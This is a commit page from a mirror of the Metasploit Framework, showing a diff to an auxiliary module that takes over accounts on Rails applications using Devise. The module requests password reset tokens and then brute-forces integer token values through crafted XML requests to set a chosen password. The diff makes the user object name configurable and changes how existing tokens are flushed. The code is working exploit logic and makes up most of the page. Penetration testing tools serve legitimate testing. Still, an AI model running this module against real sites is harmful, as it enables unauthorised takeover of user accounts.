infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2705, @jjarmoc's user object configuration on rails_devise_pass_reset

bug/bundler_fix
jvazquez-r7 2013-12-02 11:04:29 -06:00
parent bd5113c477 03838aaa79
commit ba39a8e826
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 9 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/auxiliary/admin/http/rails_devise_pass_reset.rb
View File

@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}"
postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s
xml = ""
xml << "<user>"
xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>"
xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run
# Clear outstanding reset tokens, helps ensure we hit the intended account.
print_status("Clearing existing tokens...")
clear_tokens() if datastore['FLUSHTOKENS']
if datastore['FLUSHTOKENS']
print_status("Clearing existing tokens...")
clear_tokens()
end
# Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL'])
@ -162,4 +164,4 @@ class Metasploit3 < Msf::Auxiliary
status = reset_one(datastore['PASSWORD'], true)
status ? print_good("Password reset worked successfully") : print_error("Failed to reset password")
end
end
end